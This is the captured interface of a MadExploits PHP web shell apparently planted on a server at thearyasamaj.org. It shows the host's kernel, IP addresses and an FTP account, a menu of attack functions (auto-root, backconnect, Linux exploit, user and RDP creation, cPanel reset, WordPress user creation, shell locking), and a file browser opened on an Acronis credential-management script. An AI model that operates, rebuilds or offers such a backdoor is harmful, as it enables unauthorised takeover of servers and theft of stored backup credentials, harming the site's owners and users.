Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
Acronis /
PyShell /
site-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
agents.py
36.7
KB
-rw-r--r--
amsctl.py
202.84
KB
-rw-r--r--
cep.py
26.85
KB
-rw-r--r--
change_machine_id.py
18.61
KB
-rw-r--r--
cleanup_backups.py
17.44
KB
-rw-r--r--
dmldump.py
1.61
KB
-rw-r--r--
gtobview.py
16.08
KB
-rw-r--r--
manage_creds.py
2.76
KB
-rw-r--r--
multi_mms.py
12.17
KB
-rw-r--r--
register_mms.py
1.88
KB
-rw-r--r--
set_logging.py
6.97
KB
-rw-r--r--
stdspecs.zip
13.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manage_creds.py
import argparse import acrort import acrobind import getpass import shlex ANY_ARCHIVE_ID = '_any_archive_' def convert_arg_line_to_args(arg_line): for arg in shlex.split(arg_line): yield arg class PasswordPromptAction(argparse.Action): def __call__(self, parser, args, values, option_string=None): if values: setattr(args, self.dest, values) else: setattr(args, self.dest, getpass.getpass('Enter the encryption password:')) def parse_arguments(): parser = argparse.ArgumentParser(fromfile_prefix_chars='@') parser.convert_arg_line_to_args = convert_arg_line_to_args parser.add_argument('--set-username', dest='username', default='') parser.add_argument('--set-password', dest='password', type=str, action=PasswordPromptAction, nargs='?') parser.add_argument('--list', action='store_true') parser.add_argument('--reset', action='store_true') parser.add_argument('--connection', nargs=3, metavar=('HOST', 'USERNAME', 'PASSWORD')) parser.add_argument('--resource-address', dest='resource', default=ANY_ARCHIVE_ID) parser.add_argument('--resource-type', dest='resource_type', default=acrort.access.CATEGORIES[acrort.access.ARCHIVE]) return parser.parse_args() def main(): host = None args = parse_arguments() if args.connection is not None: host = args.connection[0] username = args.connection[1] password = args.connection[2] if host: connection = acrort.connectivity.Connection(acrort.connectivity.PROTO_MMS, host, (username, password)) else: connection = acrort.connectivity.Connection(acrort.connectivity.PROTO_MMS) if args.password: if not args.resource_type or not args.resource: print('resource_type and resource arguments are required') return profile = connection.access.open_system_profile() print("Add new entry...") profile.add_account(resource_type=args.resource_type, resource_address=args.resource, user_name=args.username, password=args.password) print("Done") elif args.reset: if not args.resource_type or not args.resource: print('resource_type and resource arguments are required') return print("Removing entry...") profile = connection.access.open_system_profile() profile.delete_account(resource_type=args.resource_type, resource_address=args.resource) print("Done") elif args.list: print("List entries...") profile = connection.access.open_system_profile() for i in profile.select(): print(i) print("Done") if __name__ == '__main__': exit(acrobind.safe_execute(main))
Close